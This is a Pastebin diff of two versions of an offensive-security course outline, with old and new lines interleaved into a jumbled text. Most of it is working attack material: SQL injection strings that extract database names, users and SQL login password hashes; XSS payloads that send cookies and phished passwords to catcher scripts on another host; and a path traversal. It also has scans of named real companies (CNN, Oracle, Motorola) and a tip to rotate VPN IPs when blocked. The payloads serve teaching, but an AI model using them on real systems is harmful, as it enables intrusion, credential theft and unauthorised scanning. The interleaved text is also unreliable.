View difference between Paste ID: <a href="/1crPaSjk">1crPaSjk</a> and <a href="/JZdCHrN4">JZdCHrN4</a> - Pastebin.com

View difference between Paste ID: 1crPaSjk and JZdCHrN4

SHOW: | | - or go back to the newest paste.

1		Secure Software Development
2	-	# Passive Recon #
2	+	https://s3.amazonaws.com/StrategicSec-Files/SecureSoftwareDevelopment.zip
3
4
5	-	- Wikipedia Page
5	+
6	-	- Are they Public or Private?
6	+
7	-	- Does the target have any subsidiaries?
7	+
8	-	- Have they had any scandals?
8	+	# Down & Dirty App Sec #
9		########################
10	-	- Robtex
10	+
11	-	- Show system map
11	+	Download VMWare Player if you are not currently running a version of Vmware that is newer than VMWare Workstation 11, Vmware Fusion 7, or Vmware Player 11. VMWare Player is free and you download it from here:
12		https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
13
14
15
16		Download the course virtual machines:
17		https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
18	-	- I prefer to use Putty to SSH into my Linux host.
18	+	username: strategicsec
19	-	- You can download Putty from here:
19	+	password: strategicsec
20	-	- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
20	+
21
22	-	Here is the information to put into putty
22	+
23		Start with simple Firefox Addons:
24	-	Host Name: 107.191.39.106
24	+
25	-	protocol: ssh
25	+	- ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
26	-	port: 22
26	+	- Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
27	-	username: ceh
27	+	- FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
28	-	password: passtheceh
28	+	- Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
29		- Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
30
31		A good list of web app testing add ons for Firefox:
32		https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
33
34	-	---------------------------Type This-----------------------------------
34	+
35
36
37
38
39
40		##################################
41		# Basic: Web Application Testing #
42	-	http://whois.domaintools.com/
42	+
43
44		Most people are going to tell you reference the OWASP Testing guide.
45		https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
46
47	-	---------------------------Type This-----------------------------------
47	+
48	-	dig axfr @nsztm1.digi.ninja zonetransfer.me
48	+
49
50		The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
51
52	-	./ipcrawl 148.87.1.1 148.87.1.254
52	+	1. Does the website talk to a DB?
53		- Look for parameter passing (ex: site.com/page.php?id=4)
54		- If yes - try SQL Injection
55
56		2. Can I or someone else see what I type?
57		- If yes - try XSS
58
59		3. Does the page reference a file?
60		- If yes - try LFI/RFI
61
62		Let's start with some manual testing against 54.149.82.150
63
64
65		Start here:
66		http://54.149.82.150/
67	-	# Scanning Methodology #
67	+
68
69		There's no parameter passing on the home page so the answer to question 1 is NO.
70	-	- Ping Sweep
70	+	There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
71	-	What's alive?
71	+
72	-	------------
72	+	Try an XSS in the search box on the home page:
73		<script>alert(123);</script>
74	-	---------------------------Type this command-----------------------------------
74	+
75	-	sudo nmap -sP 157.166.226.*
75	+	Doing this gives us the following in the address bar:
76	-	-------------------------------------------------------------------------------
76	+	http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
77
78		Ok, so we've verified that there is XSS in the search box.
79
80	-	-if -SP yields no results try:
80	+	Let's move on to the search box in the left of the page.
81	-	---------------------------Type this command-----------------------------------
81	+
82	-	sudo nmap -sL 157.166.226.*
82	+	Let's give the newsletter signup box a shot
83	-	-------------------------------------------------------------------------------
83	+
84		Moving on to the login page.
85		http://54.149.82.150/login.aspx
86
87	-	-Look for hostnames:
87	+	I entered a single quote (') for both the user name and the password. I got the following error:
88	-	---------------------------Type this command-----------------------------------
88	+
89	-	sudo nmap -sL 157.166.226.* \| grep cnn
89	+
90	-	-------------------------------------------------------------------------------
90	+
91		http://54.149.82.150/bookdetail.aspx?id=2'
92
93
94	-	- Port Scan
94	+
95	-	What's where?
95	+
96	-	------------
96	+
97	-	---------------------------Type this command-----------------------------------
97	+
98	-	sudo nmap -sS 162.243.126.247
98	+
99	-	-------------------------------------------------------------------------------
99	+
100
101
102
103	-	- Bannergrab/Version Query
103	+
104	-	What versions of software are running
104	+
105	-	-------------------------------------
105	+
106
107	-	---------------------------Type this command-----------------------------------
107	+
108	-	sudo nmap -sV 162.243.126.247
108	+
109	-	-------------------------------------------------------------------------------
109	+
110		#############################################################################
111		# SQL Injection #
112		# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
113		#############################################################################
114	-	- Vulnerability Research
114	+
115	-	Lookup the banner versions for public exploits
115	+
116	-	----------------------------------------------
116	+
117	-	https://www.exploit-db.com/search
117	+
118	-	http://securityfocus.com/bid
118	+
119	-	https://packetstormsecurity.com/files/tags/exploit/
119	+
120		# Error-Based SQL Injection #
121		#############################
122		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
123	-	Network Penetration Testing Process (known vulnerabilities)
123	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
124	-	-----------------------------------------------------------
124	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
125		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
126		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
127	-	1. Ping Sweep:
127	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
128	-	The purpose of this step is to identify live hosts
128	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
129		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
130	-	nmap -sP <ip-address/ip-range>
130	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
131
132
133	-	2. Port Scan
133	+
134	-	Identify running services. We use the running services to map the network topology.
134	+
135		#############################
136	-	nmap -sS <ip-address/ip-range>
136	+
137		#############################
138		http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
139	-	3. Bannergrab
139	+	http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
140	-	Identify the version of version of software running on each port
140	+	http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
141		http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
142	-	nmap -sV <ip-address/ip-range>
142	+	http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
143	-
143	+	http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
144		http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
145		http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
146	-	4. Vulnerability Research
146	+	http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
147	-	Use the software version number to research and determine if it is out of date (vulnerable).
147	+	http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
148
149	-	exploit-db.com/search
149	+	We are using a union select statement because we are joining the developer's query with one of our own.
150		Reference:
151		http://www.techonthenet.com/sql/union.php
152		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
153		It removes duplicate rows between the various SELECT statements.
154
155		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
156
157		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
158
159	-	Skill Level 1. Run the scanners
159	+	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
160	-	-------------------------------
160	+
161	-	Nexpose
161	+	http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
162	-	Qualys
162	+	http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
163	-	Retina
163	+	http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
164	-	Nessus known vulnerabilities
164	+	http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
165	-	OpenVas
165	+
166	-	Foundscan
166	+
167	-	GFI LanGuard
167	+
168	-	NCircle
168	+
169
170		- Another way is to see if you can get the backend to perform an arithmetic function
171	-	Skill Level 2. Manual vulnerability validation (known vulnerabilities)
171	+	http://54.149.82.150/bookdetail.aspx?id=(2)
172		http://54.149.82.150/bookdetail.aspx?id=(4-2)
173		http://54.149.82.150/bookdetail.aspx?id=(4-1)
174	-	windows -> systeminfo
174	+
175	-	Linux-> dpkg -l
175	+
176	-	rpm -qa
176	+
177		http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
178	-	Mac OS X -> sudo find / -iname *.app
178	+	http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
179		http://54.149.82.150/bookdetail.aspx?id=1*1
180		http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
181		http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
182		http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
183		http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
184		http://54.149.82.150/bookdetail.aspx?id=2 &0#
185
186
187	-	- http://toolbar.netcraft.com/site_report
187	+
188	-	- https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
188	+
189
190		###############################
191		# Blind SQL Injection Testing #
192	-	---------------------------Type This-----------------------------------
192	+
193	-	dig microsoft.com
193	+
194
195		3 - Total Characters
196	-	bash lbd.sh microsoft.com
196	+	http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
197		http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
198		http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
199
200		Let's go for a quick check to see if it's DBO
201		http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
202
203		Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
204
205		D - 1st Character
206		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
207		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
208	-	---------------------------Type This-----------------------------------
208	+	http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
209		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
210	-	wafw00f http://www.oracle.com
210	+
211	-	wafw00f https://www.cnn.com
211	+
212	-	wafw00f https://cnn.com
212	+	http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
213	-	wafw00f https://www.infosecaddicts.com
213	+	http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
214
215		O - 3rd Character
216		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
217		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
218		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
219		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
220		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
221		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
222	-	sudo nmap -p 80 --script http-waf-detect.nse
222	+
223
224
225
226
227
228	-	# Scanning Methodology #
228	+
229
230
231	-	- Ping Sweep
231	+
232	-	What's alive?
232	+	###################################################################
233	-	------------
233	+	# What is XSS #
234		# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
235	-	---------------------------Type This-----------------------------------
235	+	###################################################################
236	-	sudo nmap -sP 157.166.226.*
236	+
237		OK - what is Cross Site Scripting (XSS)
238
239		1. Use Firefox to browse to the following location:
240
241		http://54.172.112.249/xss_practice/
242	-	-if -SP yields no results try:
242	+
243	-	---------------------------Type This-----------------------------------
243	+	A really simple search page that is vulnerable should come up.
244	-	sudo nmap -sL 157.166.226.*
244	+
245
246
247
248		2. In the search box type:
249
250	-	-Look for hostnames:
250	+	<script>alert('So this is XSS')</script>
251	-	---------------------------Type This-----------------------------------
251	+
252	-	sudo nmap -sL 157.166.226.* \| grep com
252	+
253		This should pop-up an alert window with your message in it proving XSS is in fact possible.
254		Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
255
256
257		3. In the search box type:
258	-	- Port Scan
258	+
259	-	What's where?
259	+	<script>alert(document.cookie)</script>
260	-	------------
260	+
261	-	---------------------------Type This-----------------------------------
261	+
262	-	sudo nmap -sS 162.243.126.247
262	+	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
263		Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
264
265		4. Now replace that alert script with:
266
267		<script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
268	-	- Bannergrab/Version Query
268	+
269	-	What versions of software are running
269	+
270	-	-------------------------------------
270	+
271
272	-	---------------------------Type This-----------------------------------
272	+
273	-	sudo nmap -sV 162.243.126.247
273	+
274		http://54.172.112.249/xss_practice/cookie_stealer_logs.html
275
276
277		The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
278
279
280	-	- Vulnerability Research
280	+
281	-	Lookup the banner versions for public exploits
281	+
282	-	----------------------------------------------
282	+
283	-	http://exploit-db.com
283	+
284	-	http://securityfocus.com/bid
284	+
285	-	https://packetstormsecurity.com/files/tags/exploit/
285	+
286		############################
287
288	-	###################################A###############
288	+
289	-	----------- ############### # Day 2: Software Exploitation & Malware Analysis # ############### -----------
289	+
290	-	###################################################
290	+
291
292		Use Firefox to browse to the following location:
293	-	# Scanning Methodology #
293	+
294		http://54.172.112.249/xss_practice/
295
296	-	- Ping Sweep
296	+
297	-	What's alive?
297	+
298	-	------------
298	+
299		----------------------------
300	-	---------------------------Type this command-----------------------------------
300	+
301	-	sudo nmap -sP 157.166.226.*
301	+
302	-	-------------------------------------------------------------------------------
302	+
303		--------
304
305		<script>
306	-	-if -SP yields no results try:
306	+	password=prompt('Your session is expired. Please enter your password to continue',' ');
307	-	---------------------------Type this command-----------------------------------
307	+	document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
308	-	sudo nmap -sL 157.166.226.*
308	+
309	-	-------------------------------------------------------------------------------
309	+
310
311		Now view the stolen cookie at:
312		http://54.172.112.249/xss_practice/passwords.html
313	-	-Look for hostnames:
313	+
314	-	---------------------------Type this command-----------------------------------
314	+
315	-	sudo nmap -sL 157.166.226.* \| grep cnn
315	+
316	-	-------------------------------------------------------------------------------
316	+
317		--------
318		<script>
319		username=prompt('Please enter your username',' ');
320	-	- Port Scan
320	+
321	-	What's where?
321	+	document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
322	-	------------
322	+
323	-	---------------------------Type this command-----------------------------------
323	+
324	-	sudo nmap -sS 162.243.126.247
324	+
325	-	-------------------------------------------------------------------------------
325	+
326
327		Now view the stolen cookie at:
328		http://54.172.112.249/xss_practice/username_password_logs.html
329	-	- Bannergrab/Version Query
329	+
330	-	What versions of software are running
330	+
331	-	-------------------------------------
331	+
332
333	-	---------------------------Type this command-----------------------------------
333	+
334	-	sudo nmap -sV 162.243.126.247
334	+	# Let's kick it up a notch with ASP.NET #
335	-	-------------------------------------------------------------------------------
335	+	# http://54.200.178.220/ #
336		#########################################
337
338
339		The trading Web App is on http://54.200.178.220/
340	-	- Vulnerability Research
340	+
341	-	Lookup the banner versions for public exploits
341	+
342	-	----------------------------------------------
342	+	Try the following in the search box:
343	-	https://www.exploit-db.com/search
343	+	<script>alert(123);</script>
344	-	http://securityfocus.com/bid
344	+	' or 1=1
345	-	https://packetstormsecurity.com/files/tags/exploit/
345	+	' and a=a
346		1=1
347		Joe'+OR+1=1;--
348
349	-	Network Penetration Testing Process (known vulnerabilities)
349	+
350	-	-----------------------------------------------------------
350	+	<script>alert(123);</script>
351
352		Open a new tab in firefox and try this:
353	-	1. Ping Sweep:
353	+	http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
354	-	The purpose of this step is to identify live hosts
354	+
355
356	-	nmap -sP <ip-address/ip-range>
356	+	Try the contact us form.
357		Open a new tab in firefox and try this:
358		http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
359	-	2. Port Scan
359	+
360	-	Identify running services. We use the running services to map the network topology.
360	+	Try this on the inquiry form:
361		Joe McCray
362	-	nmap -sS <ip-address/ip-range>
362	+	1234567890
363		joe@strategicsec.com') waitfor delay '00:00:10'--
364
365	-	3. Bannergrab
365	+
366	-	Identify the version of version of software running on each port
366	+	Login Box:
367
368	-	nmap -sV <ip-address/ip-range>
368	+	' or 1=1 or ''='
369	-
369	+	anything (click login instead of pressing enter)
370
371
372	-	4. Vulnerability Research
372	+
373	-	Use the software version number to research and determine if it is out of date (vulnerable).
373	+	Tamper Data: (notice 2 session IDs)
374
375	-	exploit-db.com/search
375	+	AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
376		IsAdmin=yes;
377		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
378
379
380
381		Profile - Detail (tamper data)
382		Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
383		joe\|set
384
385	-	Skill Level 1. Run the scanners
385	+
386	-	-------------------------------
386	+	xss_upload.txt (Upload Bulk Order)
387	-	Nexpose
387	+	<script>alert(123);</script>
388	-	Qualys
388	+
389	-	Retina
389	+
390	-	Nessus known vulnerabilities
390	+
391	-	OpenVas
391	+
392	-	Foundscan
392	+
393	-	GFI LanGuard
393	+
394	-	NCircle
394	+
395		There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
396
397	-	Skill Level 2. Manual vulnerability validation (known vulnerabilities)
397	+
398
399
400	-	windows -> systeminfo
400	+
401	-	Linux-> dpkg -l
401	+
402	-	rpm -qa
402	+
403
404		Step 3: When you load your fuzz strings - use the following decision tree
405
406		- Are the fuzz strings causing a default error message (example 404)?
407		- If this is the case then it is most likely NOT vulnerable
408
409		- Are the fuzz strings causing a WAF or LB custom error message?
410	-	#####################################
410	+	- If this is the case then you need to find an encoding method to bypass
411	-	# Quick Stack Based Buffer Overflow #
411	+
412	-	#####################################
412	+
413		- Are the fuzz strings causing an error message that discloses the backend type?
414	-	- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
414	+	- If yes, then identify DB type and find correct syntax to successfully exploit
415	-	http://45.63.104.73/ExploitLab.zip
415	+	- Some example strings that I use are:
416		'
417		"
418	-	- Extract the ExploitLab.zip file to your Desktop
418	+	() <----- Take the parameter value and put it in parenthesis
419		(5-1) <----- See if you can perform an arithmetic function
420	-	- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
420	+
421
422		- Are the fuzz strings rendering executable code?
423		- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
424	-	---------------------------Type This-----------------------------------
424	+	- Some example strings that I use are:
425		<b>hello</b>
426	-	--------------------------------------------------------------------------
426	+	<u>hello</u>
427		<script>alert(123);</script>
428		<script>alert(xss);</script>
429		<script>alert('xss');</script>
430		<script>alert("xss");</script>
431	-	- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
431	+
432
433
434
435
436
437		############################
438		# Trading Web App with WAF #
439		# http://54.213.131.105 #
440	-	- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
440	+
441
442	-	- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
442	+
443		Try the following in the search box:
444		<script>alert(123);</script>
445		<script>alert(123);</script
446		<script>alert(123)
447		<script>alert
448		<script>
449		<script
450		<scrip
451		<scri
452		<scr
453		<sc
454		<s
455		<p
456		<
457		< s
458		Joe'+OR+1=1;--
459
460
461		Open a new tab in firefox and try this:
462		http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
463
464
465		xss_upload.txt (Upload Bulk Order)
466		<script>alert(123);</script>
467
468
469		Login Box:
470
471	-	Skill Level 3. Identify unknown vulnerabilities
471	+	' or 1=1 or ''='
472	-	-----------------------------------------------
472	+	anything
473
474	-	- App Type
474	+
475	-	------------
475	+
476	-	Stand Alone Client Server Web App
476	+	Tamper Data: (notice 2 session IDs)
477
478	-	*(vulnerserver.exe)*
478	+	AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
479		IsAdmin=yes;
480		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
481	-	- Input TYpe
481	+
482	-	-------------
482	+
483	-	FIle logical network port Browser
483	+
484	-	Keyboard
484	+	Profile - Detail (tamper data)
485	-	Mouse
485	+	Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
486		joe\|set
487
488
489	-	*(9999)*
489	+
490
491
492	-	- Map & Fuzz app entry points:
492	+
493
494	-	- Commands *(commands)*
494	+	###########################################################
495	-	- Methods
495	+	# Attacking an Oracle/JSP based WebApp with SQL Injection #
496	-	- Verbs
496	+	###########################################################
497	-	- functions
497	+
498	-	- subroutines
498	+
499	-	- controllers
499	+
500
501
502	-	- Isolate the crash
502	+	http://54.69.156.253:8081/bookcompany/
503	-	-------------------
503	+
504	-	App seems to reliably crash at TRUN 2100
504	+
505		user: a' OR 'a'='a
506		pass: a' OR 'a'='a
507	-	- Calculate the distance to EIP
507	+
508	-	-------------------------------
508	+
509	-	Distance to EIP is 2006
509	+
510
511	-	We found that EIP was populated with the value: 396F4338
511	+
512	-	396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
512	+
513
514	-	An online tool that we can use for this is:
514	+	http://54.69.156.253:8081/bookcompany/author.jsp?id=111
515	-	https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
515	+
516
517		[ Search by Username ] Joe' OR 'a'='a
518
519	-	- Redirect Program Execution
519	+
520
521	-	A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
521	+
522	-	We learned that we control EAX and ESP in script 2.
522	+
523
524
525
526
527
528	-	- Implement Shellcode
528	+
529	-	---------------------
529	+
530	-	There are only 2 things that can go wrong with shellcode:
530	+	http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
531	-	- Not enough space
531	+
532	-	- Bad characters
532	+
533
534		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
535
536
537
538
539
540	-	# FreeFloat FTP Server Exploit Analysis #
540	+
541
542
543
544
545	-	Analyze the following exploit code:
545	+
546	-	https://www.exploit-db.com/exploits/15689/
546	+
547
548	-	1. What is the target platform that this exploit works against?
548	+
549	-	2. What is the variable name for the distance to EIP?
549	+
550	-	3. What is the actual distance to EIP in bytes?
550	+	http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
551	-	4. Describe what is happening in the variable ‘junk2’
551	+
552
553		Host is running:
554
555
556	-	Analysis of the training walk-through based on EID: 15689:
556	+
557	-	http://45.63.104.73/ff.zip
557	+
558
559		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
560
561		User is:
562	-	ff1.py
562	+
563	-	1. What does the sys module do?
563	+
564	-	2. What is sys.argv[1] and sys.argv[2]?
564	+
565	-	3. What application entry point is being attacked in this script?
565	+
566
567		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
568
569	-	ff2.py
569	+	Current database is:
570	-	1. Explain what is happening in lines 18 - 20 doing.
570	+
571	-	2. What is pattern_create.rb doing and where can I find it?
571	+
572	-	3. Why can’t I just double click the file to run this script?
572	+
573
574
575
576	-	ff3.py
576	+
577	-	1. Explain what is happening in lines 17 - to 25?
577	+
578	-	2. Explain what is happening in lines 30 - to 32?
578	+
579	-	3. Why is everything below line 35 commented out?
579	+
580
581		sudo /sbin/iptables -F
582		cd /home/strategicsec/toolz
583	-	ff4.py
583	+
584	-	1. Explain what is happening in lines 13 to 15.
584	+
585	-	2. Explain what is happening in line 19.
585	+
586	-	3. What is the total length of buff?
586	+
587		# Target IP Determination #
588		###########################
589
590	-	ff5.py
590	+
591	-	1. Explain what is happening in line 15.
591	+
592	-	2. What is struct.pack?
592	+
593	-	3. How big is the shellcode in this script?
593	+	http://www.networksolutions.com/whois/index.jsp
594
595		cd ~/toolz/fierce2
596		fierce -dns motorola.com
597	-	ff6.py
597	+	cd ..
598	-	1. What is the distance to EIP?
598	+
599	-	2. How big is the shellcode in this script?
599	+
600	-	3. What is the total byte length of the data being sent to this app?
600	+	dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
601
602
603		cd ~/toolz/
604		./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
605	-	ff7.py
605	+
606	-	1. What is a tuple in python?
606	+
607	-	2. How big is the shellcode in this script?
607	+
608	-	3. Did your app crash in from this script?
608	+
609
610		sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255 Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
611
612
613	-	ff8.py
613	+
614	-	1. How big is the shellcode in this script?
614	+
615	-	2. What is try/except in python?
615	+
616	-	3. What is socket.SOCK_STREAM in Python?
616	+
617
618		Here are some options to use for identifying load balancers:
619		- news.netcraft.com
620	-	ff9.py
620	+	- Firefox LiveHTTP Headers
621	-	1. What is going on in lines 19 and 20?
621	+
622	-	2. What is the length of the NOPs?
622	+
623	-	3. From what DLL did the address of the JMP ESP come from?
623	+
624
625		dig google.com
626
627		cd ~/toolz
628	-	ff010.py
628	+	./lbd-0.1.sh google.com
629	-	1. What is going on in lines 18 - 20?
629	+
630	-	2. What is going on in lines 29 - 32?
630	+
631	-	3. How would a stack adjustment help this script?
631	+
632		halberd motorola.com
633		halberd oracle.com
634
635	-	#################################
635	+
636	-	# The malware analysis scenario #
636	+
637	-	#################################
637	+	# Intrusion Prevention Detection #
638	-	You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
638	+
639
640
641	-	The fastest thing you can do is perform static analysis.
641	+	osstmm-afd -P HTTP -t www.strategicsec.com -v
642
643		cat /etc/xinetd.d/ssltest
644
645		cat /home/strategicsec/toolz/ssl_proxy.sh
646	-	# Static Analysis #
646	+
647		service xinetd status
648
649		osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v
650
651		**** If you are getting your IP blocked you can use a service like AceVPN to give you multiple IPs to launches your tests from. ****
652	-	---------------------------Type This-----------------------------------
652	+
653	-	file wannacry.exe
653	+
654
655	-	hexdump -n 2 -C wannacry.exe
655	+
656		# Web Application Firewall Detection #
657		######################################
658
659		cd ~/toolz/wafw00f
660		python wafw00f.py http://www.oracle.com
661		python wafw00f.py http://www.strategicsec.com
662	-	Reference:
662	+
663
664		cd ~/toolz/
665		sudo nmap -p 80 --script http-waf-detect.nse oracle.com
666
667	-	---------------------------Type This-----------------------------------
667	+
668
669	-	objdump -x wannacry.exe
669	+
670
671	-	strings wannacry.exe
671	+
672		#######################################################
673	-	strings --all wannacry.exe \| head -n 6
673	+	# Day 1: 3rd Party Scanning, and scanning via proxies #
674		#######################################################
675	-	strings wannacry.exe \| grep -i dll
675	+
676		http://www.shodanhq.com/
677	-	strings wannacry.exe \| grep -i library
677	+
678		Create a FREE account and login
679	-	strings wannacry.exe \| grep -i reg
679	+
680		net:129.188.8.0/24
681	-	strings wannacry.exe \| grep -i key
681	+
682
683	-	strings wannacry.exe \| grep -i rsa
683	+
684		cd /home/strategicsec/toolz/
685	-	strings wannacry.exe \| grep -i open
685	+	perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
686
687	-	strings wannacry.exe \| grep -i get
687	+
688
689	-	strings wannacry.exe \| grep -i mutex
689	+	sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: ocks4 127.0.0.1 9050
690
